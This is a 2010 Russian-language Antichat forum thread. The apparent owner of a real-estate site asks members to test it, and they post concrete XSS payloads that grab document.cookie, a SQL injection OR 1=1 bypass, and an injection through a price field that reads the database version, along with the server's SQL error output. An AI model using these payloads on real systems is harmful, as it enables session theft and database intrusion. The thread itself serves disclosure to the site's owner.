Форум АНТИЧАТ - Проверка на разные уязвимости

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Проверка на уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=110)

- - Проверка на разные уязвимости (https://forum.antichat.xyz/showthread.php?t=196773)

bazzjr

16.04.2010 20:38

Проверка на разные уязвимости

Всем госу взлома и тестов привет!

Ребята, пожалуйста проверте сайт http://norieltor.ru на разного рода уязвимости.

bazzjr

19.04.2010 03:20

что... совсем нет ошибок?

Ruslan1817

19.04.2010 03:44

уязвимо : ваше имя
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';">alert('XSS')','177','a4c0338947c01a38489d4e0e7 d45ad06','2010-04-19 03' at line 1

http://norieltor.ru/search/offer=1&p=3&city=7700000000000&o=2&r=1&ml=1&pl='>" ><script>alert(document.cookie)</script>

Что смог нашел.

bazzjr

19.04.2010 16:48

спасибо поправим

pinch

20.04.2010 20:44

незнаю уязвимость или нет но по крайней мере ругается:
http://norieltor.ru/search/offer=1&p=3&o=2&r=4,3&c1=0&c2=0&s=1&v=1&page=1

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''2'' and `komnati` IN (4,3) and UNIX_TIMESTAMP(datetime_post) > 1266424935 ORDER' at line 1

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '',3) and UNIX_TIMESTAMP(datetime_post) > 1266424951 ORDER BY `datetime_post` DES' at line 1

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '') and UNIX_TIMESTAMP(datetime_post) > 1266424972 ORDER BY `datetime_post` DESC' at line 1

ругается вот этот вот кусочек:
&o=2&r=4,3

BlackSun

20.04.2010 22:15

Там sql-inj, а вы из слона делаете муху со своими xss и "ругается".

http://norieltor.ru/search/offer=1&p=3&o=2&r=-55)+OR+1=1+--+-3&c1=0&c2=0&s=1&v=1&page=1

bazzjr

20.04.2010 23:34

BlackSun и pinch спасибо, поправил уже.

life_glider

22.04.2010 00:07

Код:

http://norieltor.ru/search/offer=1&p=3&c1=&c2=9999999999%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Пассивка

Код:

http://norieltor.ru/search/offer=1&p=3&c1=9999999999%22%3E%3Cscript%3Ealert(%22HOLE%22)%3C/script%3E&c2=

Еще одна

Код:

http://norieltor.ru/search/offer=1&p=3%22%3E%3Cscript%3Ealert(%22HOLE%22)%3C/script%3E&c1=9999999999&c2=

Там же

Инъекция!!!
http://norieltor.ru/edit/ -редактируем своё сообщение
в цену вставляем: 200', `cena`=(SELECT VERSION()),`plita`='1. В цене получим покоцаную версию.
Инъекция есть во всех остальных полях!!!

Продолжим:
4)http://norieltor.ru/search/offer=1&f=2%22%3Cscript%3Ealert(document.cookie)%3 C/script%3E
5)http://norieltor.ru/search/offer=1&v=2"<script>alert(document.cookie)</script>
6)http://norieltor.ru/search/offer=1&s=2%22%3Cscript%3Ealert(document.cookie)%3 C/script%3E

Время: 23:09